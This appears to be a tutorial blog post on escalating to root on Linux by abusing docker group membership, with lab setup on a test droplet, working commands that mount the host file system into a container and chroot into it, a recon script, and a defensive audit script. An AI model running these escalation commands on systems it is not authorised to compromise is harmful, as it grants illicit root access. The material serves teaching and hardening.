Today we are going to learn how to elevate our privileges on a Linux system by abusing membership of the docker group.

Docker

What is Docker?

Docker is a set of platform as a service products that uses OS-level virtualization to deliver software in packages called containers. Containers are isolated from one another and bundle their own software, libraries and configuration files; they can communicate with each other through well-defined channels.

How does Docker lead to privesc?

When an admin adds an unprivileged user to the 'docker' group, that user can use the docker CLI to create containers. The CLI itself is nothing special and does not carry a SUID bit; it simply talks to the Docker daemon (dockerd) over the Unix socket /var/run/docker.sock, which is owned by root:docker. The daemon runs as root, so anyone who can issue requests over that socket can ask it to start a container with any part of the host file system mounted inside, and from there read or modify root-owned files and elevate their privileges on the target. This is why Docker's own documentation says that membership of the docker group is equivalent to root.
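Before touching a target it is worth checking whether this technique applies at all. The script below is an added example, not code from the original post: it tests the two conditions that give an account control over dockerd (a docker group entry in the output of id, and a writable docker socket) and takes its inputs as arguments so the checks can be exercised on constructed data. The socket path is Docker's default; the user names and the sample id strings are made up.

```shell
#!/bin/sh
# Added example, not part of the original post: recon from the unprivileged
# user's side. Docker has no SUID bit; what matters is whether this account can
# write to dockerd's Unix socket, either through the docker group or because the
# socket's permissions are too loose. Inputs are passed as arguments so the
# checks can be run against constructed data as well as the live system.

# in_docker_group "<output of id>" -> 0 if the groups= list contains (docker)
in_docker_group() {
    groups_part="${1##*groups=}"          # drop everything before "groups="
    case ",$groups_part," in
        *"(docker)"*) return 0 ;;
        *)            return 1 ;;
    esac
}

# socket_writable <path> -> 0 if the path exists and we may write to it.
# Only writability is tested (not -S) so the function also works on a copied
# fixture; on a real host the path is a Unix socket, root:docker, mode 660.
socket_writable() {
    [ -e "$1" ] && [ -w "$1" ]
}

# docker_privesc_check [socket] -> 0 if this account can drive dockerd,
# printing how; 1 otherwise. The socket path defaults to Docker's standard one.
docker_privesc_check() {
    sock="${1:-/var/run/docker.sock}"
    if in_docker_group "$(id)"; then
        echo "[+] member of docker group: 'docker run -v /:/mnt ...' will run as root on the host"
        return 0
    fi
    if socket_writable "$sock"; then
        echo "[+] $sock is writable: point the CLI at it with 'docker -H unix://$sock ...'"
        return 0
    fi
    echo "[-] no access to the dockerd socket; this technique does not apply"
    return 1
}

# Run the live check when invoked directly, e.g. `sh docker_check.sh`.
# The exit status of docker_privesc_check is non-zero when nothing was found.
docker_privesc_check "$@" || :
```

The group check is done on the text of id rather than on /etc/group because the session's supplementary groups are what the kernel uses when it evaluates the socket's mode bits; a user added to the group after logging in still has to log in again before the socket becomes writable.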

Before we continue

In order to continue we need to create a vulnerable host machine.

DO NOT DO THIS ON A MACHINE YOU DON’T HAVE PERMISSIONS TO COMPROMISE

To create a vulnerable host I created a Droplet on DigitalOcean.

  1. Create a new Droplet with 2GB RAM running Debian

  2. SSH to the new Droplet

  3. Install docker-ce following Docker's installation guide for Debian

Now we need to add an unprivileged user:

root@target:~# adduser affix
Adding user `affix' ...
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
Adding new group `useless' (1002) ...
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
Adding new user `affix' (1002) with group `affix' ...
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
Creating home directory `/home/affix' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for affix
Enter the new value, or press ENTER for the default
 Full Name []:
 Room Number []:
 Work Phone []:
 Home Phone []:
 Other []:
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
Is the information correct? [Y/n]

Now add the new user to the docker group:

root@target:~# usermod -aG docker affix

Now SSH to the target as the new user.

Checking our access

Before we go further, let's check that we are actually in the docker group.

affix@target:~$ id
uid=1001(affix) gid=1001(affix) groups=1001(affix),999(docker)

Since we are in the docker group, let's try running the hello-world container:

affix@target:~$ docker run hello-world
Hello from Docker!
This message shows that your installation appears to be working correctly.
To generate this message, Docker took the following steps:
1. The Docker client contacted the Docker daemon.
2. The Docker daemon pulled the “hello-world” image from the Docker Hub. (amd64)
3. The Docker daemon created a new container from that image which runs the executable that produces the output you are currently reading.
4. The Docker daemon streamed that output to the Docker client, which sent it to your terminal.
To try something more ambitious, you can run an Ubuntu container with:
 $ docker run -it ubuntu bash
Share images, automate workflows, and more with a free Docker ID:
https://hub.docker.com/
For more examples and ideas, visit:
https://docs.docker.com/get-started/

Success! We can run containers, so let's move on.

Reading Files

Docker can be used to read files on the target machine. This is useful for quickly grabbing file contents (for example, a flag). Mount the directory you want to read into a container and read the file from inside it:

affix@target:~$ docker run -v /root:/mnt alpine cat /mnt/flag.txt
2590d7e9e24c67f41b485f16e2796b3d0e3128379b81e6ca290d67e99376e794

So what exactly did this do?

By using the -v flag we specified a bind mount: the /root directory on the host was mounted at /mnt inside the container. The mount is performed by dockerd, which runs as root, so the host's permissions on /root never apply to us: our unprivileged account never opens the directory itself, it only asks the daemon to do so. The process inside the container also runs as uid 0 by default, which is why cat could read a root-owned file.

Let's get full root system access

Just like reading files, we can mount the host's entire file system into a container and then chroot into the mount. The result is a root shell whose view of the file system is the host's:

affix@target:~$ docker run -it -v /:/mnt alpine chroot /mnt
root@e63d48d18e03:/# ls /root/
flag.txt
root@e63d48d18e03:/# cat /root/flag.txt
2590d7e9e24c67f41b485f16e2796b3d0e3128379b81e6ca290d67e99376e794
root@e63d48d18e03:/# cat /etc/issue
Debian GNU/Linux 9 \n \l

As you can see, we have full access to the system: chroot /mnt made the host's file system the root of our shell, and that shell runs as uid 0, which on a default Docker install (no user namespace remapping) is the host's root. Every file we read or write from here is the real one on the host. One caveat: the shell still lives in the container's PID and network namespaces, so host processes are not visible from it, but for an attacker the file system is what matters.
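The flip side of this finding is the check a defender (or an assessor writing up the result) runs. The following is an added example, not part of the original post: a POSIX sh audit that lists every account able to reach dockerd through the docker group, including the easily missed case of a user whose primary gid is the docker gid, and returns non-zero so it can gate a build or a hardening pass. The group and passwd contents it ships with are constructed sample data; the account names (affix, ci, builder, admin) are made up.

```shell
#!/bin/sh
# Added example, not part of the original post: the audit a defender wants.
# Every account that can reach dockerd through the docker group can become
# root exactly as shown above, so docker group membership must be treated as
# root and pruned. The group and passwd databases are passed as file paths so
# the same functions run against /etc/group and /etc/passwd on a live host or
# against copies taken from an image.

# docker_access_accounts <group-file> <passwd-file>
# Prints, sorted and deduplicated, every login that is a supplementary member
# of 'docker' or whose primary gid in passwd is the docker gid (easy to miss:
# such users never appear in the docker: line of /etc/group).
docker_access_accounts() {
    group_file="$1"
    passwd_file="$2"
    gid=$(awk -F: '$1 == "docker" { print $3 }' "$group_file")
    {
        awk -F: '$1 == "docker" {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$group_file"
        if [ -n "$gid" ]; then
            awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
        fi
    } | sort -u
}

# audit_docker_group <group-file> <passwd-file>
# Returns 0 when only root can reach dockerd, 1 otherwise, naming each
# offending account together with the command that revokes the access.
audit_docker_group() {
    found=0
    for u in $(docker_access_accounts "$1" "$2"); do
        if [ "$u" != "root" ]; then
            echo "[!] $u is effectively root via docker; revoke with: gpasswd -d $u docker" \
                 "(or usermod -g <othergroup> $u if docker is its primary group)"
            found=1
        fi
    done
    return "$found"
}

# make_sample -> prints a temp dir holding constructed group/passwd fixtures
# (sample data, not taken from a real system). 'builder' has docker's gid
# as its primary group and so is invisible in the docker: line.
make_sample() {
    dir=$(mktemp -d)
    cat > "$dir/group" <<'EOF'
root:x:0:
sudo:x:27:admin
docker:x:999:affix,ci
EOF
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
admin:x:1000:1000::/home/admin:/bin/bash
affix:x:1001:1001::/home/affix:/bin/bash
ci:x:1002:1002::/home/ci:/bin/sh
builder:x:1003:999::/home/builder:/bin/sh
EOF
    echo "$dir"
}

# Usage on a live host:  sh docker_audit.sh /etc/group /etc/passwd
# Exit status 1 means at least one non-root account can become root via Docker.
if [ "$#" -eq 2 ]; then
    audit_docker_group "$1" "$2"
fi
```

Removing the group entry is the fix this page's attack calls for; where users genuinely need to build containers, rootless Docker or a socket-proxying mechanism that restricts bind mounts is the alternative, but as long as /var/run/docker.sock is reachable by a non-root account the audit above should report it.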